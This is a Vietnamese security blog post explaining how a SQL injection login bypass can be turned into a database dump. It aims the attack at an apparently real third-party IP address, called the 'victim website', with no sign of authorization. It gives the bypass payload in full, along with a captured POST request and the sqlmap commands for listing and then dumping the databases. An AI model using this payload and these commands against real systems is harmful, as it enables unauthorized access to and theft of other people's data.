Sql Injection Bypass Login To Sql Injection Dump - MTD SEC

MTD SEC

Chia Sẻ Để Thành Công

Home Top Ad

Post Top Ad

Thứ Tư, 24 tháng 7, 2019

Sql Injection Bypass Login To Sql Injection Dump


Lỗi bypass login rất hay gặp chúng ta có thể tìm được đâu đó trên mạng tuy nhiên để biến nó thành một cái để chúng ta dump database thì không phải ai cũng biết hôm nay mình sẽ hướng dẫn các bạn làm việc này và hiểu được nó nguy hiểm như thế nào!





Sql Bypass login là cách chúng ta dùng một số username đặc biệt để tấn công vào hệ thống đăng nhập với quyền admin. tuy nhiên cũng với cách đó chúng ta có thể lấy được database cụ thể.





Trong bài này mình lấy ví dụ 1 website victim: 150.109.167.211 và payload để tiến hành login bypass là:





user: admin") aNd 5347039=5347039--





pass: tùy ý





giao diện sau đăng nhập như thế này và chúng ta thường cứ nghĩ như vậy là song nhưng muốn leo thang chúng ta cần thêm thủ thuật









Bây giờ chúng ta dùng burp suite đọc thông tin









Chúng ta chuyển qua repeater









Từ đây chúng ta có thể thấy vị trí injection là username chúng ta sẽ dùng sqlmap để khai thác với POST





các bạn lưu lại thông tin phần request chú ý xóa hết mấy cái payload linh tinh đi để lại số 1 như hình dưới









Nguyên nhân phải đổi là sau khi nhồi đám này vào sql map nó sẽ lỗi nên phải để như vậy cho nhanh





Chạy sqlmap với lệnh





sqlmap -r 123.txt -p username --level 5 --dbs




Các thông số:





123.txt: là file với nội dung bạn lưu từ burp





POST /index/index/login.html HTTP/1.1
Host: 150.109.167.211
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://150.109.167.211/
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
Connection: close
Upgrade-Insecure-Requests: 1

username=1&password=123456




-p username: cái này để chỉ vị trí cho sqlmap nó injection vào





--level 5 do đây không phải tấn công thông qua get như bình thường (mặc định là level 0) nên chúng ta cần set level cho nó nếu không nó sẽ lỗi đây là POST nên mặc định các bạn nên đổi level.





Và kết quả:









Sau đó các bạn dùng sqlmap như bình thường với các tham số -D -T -C...





Mọi thắc mắc vui lòng để lại bình luận chúng tôi sẽ giúp bạn!


Không có nhận xét nào:

Đăng nhận xét

Post Top Ad